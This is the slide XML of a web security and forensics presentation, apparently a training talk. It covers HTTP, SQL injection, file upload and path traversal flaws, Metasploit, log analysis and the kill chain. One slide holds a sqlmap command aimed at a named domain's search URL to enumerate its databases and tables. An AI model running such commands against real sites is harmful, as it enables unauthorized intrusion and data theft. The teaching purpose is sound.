                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>
              </a:rPr>
              <a:t>What if we control this?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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5: SQL injection / SQLMap</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Sqlmap -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://dchlaw.com/dashboard?search=Golf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> --dbs --tables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Typical SQL Query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM reports WHERE some_column LIKE ‘%USER_INPUT%’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72" name="Google Shape;72;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="360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13 years as a Software Engineer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SCRAM Systems</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Full-stack web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Javascript Frameworks (angular, react)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.NET/C# Business Layer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Database Layer (MSSQL, MongoDB)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Application Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cyber Defender KS ANG, CO ARNG</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability assessments on USAF Officer Personnel App, Intelligence System, DMVA network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://git.io/JuKAj</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4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974800" y="445025"/>
            <a:ext cx="2857500" cy="285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6: Insecure File Upload Validation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;24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File uploads are usually restricted to file types.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sometimes validation is done poorly, and the developer only does simple matching on the file name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How could we evade an expectation for a filename to include PDF?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7: File Path Traversal</a:t>
            </a:r>
            <a:endParaRPr/>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Vulnerability common on websites that display documents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User Input is read to determine what file the user wants</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Relative paths vs. Absolute Paths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8: Metasploit</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Framework for developing and executing exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can send many different payloads, over many types of protocols</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be used as a proxy for pivoting to an internal network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Has many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tools, like a port scanner (after gaining a foothold)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What did we learn about the language / framework?set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HTTP?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="358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Client/Server protocol (TCP Layer 7)/(TCP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Resource Actions (GET, POST, PUT, DELETE)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stateless (Request B knows nothing of Request A)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sessions maintained with cookies, and browser session storage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Client keeps the session tokens (security implications)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Caching mechanisms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authentication Header (username/passwords or tokens)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Supports multiple encodings (XML, JSON, plaintext)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Client can send data to the server (account number, personal information)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developers/Defenders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: HTTP clients are not trusted, even when authenticated</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Request / Response Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Google Shape;85;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="555500" y="3652075"/>
            <a:ext cx="3314700" cy="781050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860363" y="3109150"/>
            <a:ext cx="3971925" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Google Shape;87;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1274925"/>
            <a:ext cx="41910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Web Forensics?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Investigation of criminal activity that occurs on public facing web servers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Implies post-attack, but preparation is important also</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Artifacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP logs (IIS, Apache, nginx)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Database logs (connection logs, query history - maybe expensive)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network logs (inbound connections, especially outbound connections)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Application Logs (.NET, Java, C#)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Everything in the source directory (defacement)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Database contents (added users etc)</a:t>
            </a:r>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Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Google Shape;99;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="8839200" cy="622594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1830050"/>
            <a:ext cx="8520600" cy="273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Remote IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LAN Identity (hyphen for Internet)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Request Time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Request field (method, document, protocol version)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Response Status</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Response Size</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Referrer Header (where the user came from)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User Agent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Equifax Apache Struts (2017)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Kill Chain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="77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Kill Chain - Study of the structure of an attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Breaking the Chain - Actions taken to stop the attack, sometimes preemptively</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1987888" y="1931575"/>
            <a:ext cx="5168224" cy="2907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